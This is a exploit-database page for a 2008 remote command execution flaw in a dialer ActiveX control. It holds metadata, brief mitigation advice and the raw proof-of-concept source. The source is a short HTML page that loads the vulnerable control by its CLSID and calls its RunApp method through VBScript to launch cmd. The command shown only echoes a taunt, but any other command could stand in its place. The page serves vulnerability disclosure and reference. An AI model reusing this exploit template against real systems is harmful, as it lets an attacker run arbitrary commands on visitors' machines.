header-logo
Suggest Exploit
vendor:
Dialers ActiveX
by:
spdr
9.3
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Dialers ActiveX
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Remote Command Execution Exploit

This exploit allows remote command execution on vulnerable systems. It uses a malicious ActiveX control to execute a command on the vulnerable system. The command in this case is 'cmd /k echo So Simple, So Lame -- Somebody should get fired.'

Mitigation:

Disable ActiveX controls, use a firewall to block malicious traffic, and use a web application firewall to detect and block malicious requests.
Source

Exploit-DB raw data:

<!--
In addition to the overflow found in the "Friendly Technologies" dialers ActiveX,
Here is a "remote command execution" exploit.
Its so sad people dont actually Think...

Greetz to Binaryvision
======================
- http://www.binaryvision.org.il/
-- irc.nix.co.il/#binaryvision
--- written by spdr.
-->

<html>
<object classid='clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B' id='lamers' ></object>
<script language='vbscript'>

lamers.RunApp "cmd" ,"cmd /k echo So Simple, So Lame -- Somebody should get fired." ,0 

</script>

# milw0rm.com [2008-08-28]

Navigation

Suggest Exploit

Services By CQR